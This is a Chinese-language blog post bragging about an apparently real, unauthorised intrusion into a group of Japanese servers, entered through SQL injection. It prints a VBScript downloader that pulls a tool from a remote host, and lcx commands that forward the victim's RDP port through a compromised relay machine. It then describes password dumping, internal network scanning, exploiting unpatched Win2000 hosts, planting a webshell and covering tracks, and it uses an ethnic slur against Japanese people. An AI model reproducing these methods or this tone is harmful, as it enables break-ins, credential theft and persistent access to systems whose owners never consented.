實戰滲透日本服務器群
因為這一局,滲透獲取整個服務器群的權限,N臺服務器。所以寫篇文章小小虛榮下。
開局:
入手點是一個注射點:sa,內網, 輕車熟路寫個vbs腳本,下好lcx,轉發端口。
| 以下是引用片段: down.vbs iLocal = LCase(WScript.Arguments(1)) iRemote = LCase(WScript.Arguments(0)) Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET",iRemote,0 xPost.Send() Set sGet = CreateObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile iLocal,2 use: cscript down.vbs http://ip/lcx.exe lcx.exe (路徑默認在system32下) |
這個下載腳本可以重復使用,也不會暴露我存放工具的地址。(有些下載腳本把下載地址寫在里面,個人覺得不很好。)
由于本機連接日本網絡比較慢。連撥兩個VPN,再登上日本本土的一臺肉雞(我想這樣速度不會差了,ps:肉雞的作用體現出來了)。
加了用戶。在肉雞終端:lcx -listen 520 1982,目標機:lcx -slave myip 520 127.0.0.1 3389
ok,終端里填:127.0.0.1:1982 順利登陸。
中盤:
win2000系統,mssql server
先抓個系統密碼,找下sql密碼。查看了下一些信息,并檢查是否還有同行的后門,清除之。
分析了下密碼:(數字+機器名+數字)
其他都是鳥語也看不太明白。載了幾個基本工具放個隱藏目錄。
ps:一般進去后總得收拾下,最好不要種馬。死得快,也易暴露。
這時候就盤算著怎么拿web的權限了。(分析網絡拓撲結構了)
先看下網上鄰居:
workgroup
C**SQL2006
B**-DB
B***TENDB
....
很明顯,都是數據庫服務器。
再往上一層,又發現一個工作組:
web-k.**.jp
c***oo_db
...
哎,還是數據庫服務器。
ipconfig /all
192.168.10.18 只有一個內網ip
ok:s tcp 192.168.10.1 192.168.10.254 80 20 /save
用s掃下內網開80的機子,線程設置為20,講究精確度嘛。
很遺憾,結果出來的幾個機子都是數據庫服務器,上面并沒有網站。
我就納悶了,web服務器跑哪了呢?
收官:
翻了一陣子,仔細分析了網絡拓撲結構。最后讓我找到了:
192.168.1.1-255這段是web服務器群
接下來,用s果然掃出一片。再對應外網ip,挑選溢出的下手對象(192.168.1.19)(倭奴喜歡古董級的win2000,好多補丁都不全,好溢出)
很舒坦地日下來,然后載個webshell放到web目錄的偏僻角落。擦擦屁股走人。
ps:圖是我溢出另外一臺數據庫服務器時截下的
【編輯推薦】
